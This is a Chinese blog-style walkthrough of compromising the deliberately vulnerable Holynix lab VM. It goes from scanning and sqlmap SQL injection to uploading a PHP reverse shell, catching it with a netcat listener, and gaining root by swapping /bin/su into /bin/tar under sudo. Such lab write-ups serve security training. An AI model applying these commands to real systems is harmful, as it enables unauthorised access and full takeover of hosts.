当前位置: 首页 > article >正文

holynix靶机详解

article 2024/11/16 3:48:26

靶机配置

加一个网络适配器(网卡)

修改MAC地址

00:0C:29:BC:05:DE

原来的网卡设置为桥接,随机生成MAC地址

重启靶机即可扫到靶机IP

主机探测与端口扫描

arp-scan -l

发现开放80端口

nmap -sV -A -T4 192.168.229.153

访问网站

http://192.168.229.153/

复制请求包,在密码后加上*号,写到1.txt中放入虚拟机

sqlmap扫描

扫描发现存在sql注入

sqlmap -r 1.txt --batch --random-agent

爆数据库信息

登录

利用kali生成一个压缩过后的getshell

find / -type f -name "php*reverse*"
cp /usr/share/webshells/php/php-reverse-shell.php ./
tar -czf php.tar.gz php-reverse-shell.php

生成完后修改ip

上传该shell

来到用户目录下

http://192.168.229.153/~rtmorris/

kali开启监听

nc -nlvp 1234

提权

https://gtfobins.github.io/
sudo -l

提权成功

sudo mv /bin/tar /bin/tar.bak
sudo mv /bin/su /bin/tar
sudo tar


http://www.kler.cn/a/303225.html

相关文章:

  • 关于学习炸鸡佬智能手表 应用硬件IIC1来取代原来软件模拟的IIC
  • 【智能电视??】关于电视、以及IPTV 和OTT TV区别(了解)
  • python爬虫(二)爬取国家博物馆的信息
  • 【数学二】线性代数-二次型
  • 【论文阅读】Virtual Compiler Is All You Need For Assembly Code Search
  • 【数据价值化】国有企业数据资产入表及估值实践指南:挖掘数字资产新价值
  • PROTOTYPICAL II - The Practice of FPGA Prototyping for SoC Design
  • 【ShuQiHere】快速排序(Quick Sort):揭开高效排序算法的神秘面纱
  • 观察者模式observer
  • pdf 转 jpg
  • 黑马点评15——分布式缓存-Redis分片集群
  • C文件操作
  • Sentinel 使用案例详细教程
  • K8S - Volume - NFS 卷的简介和使用
  • SpringBoot - 入门
  • 【WPF】Popup的使用
  • IO中断原理浅析
  • 分销系统架构文档
  • OpenGL(三)着色器语言GLSL
  • 深度学习速通系列:依存分析
  • 了解计算机安全性【技术、管理与法律】
  • 如何用 OBProxy 实现 OceanBase 的最佳路由策略
  • 算法类学习笔记 ———— 障碍物检测
  • 如何使用Visual Studio的内存诊断工具进行内存泄漏检测
  • 今年的智能手机不仅仅是AI
  • 区块链领航者孙宇晨:驾驭潮流,共绘未来新篇章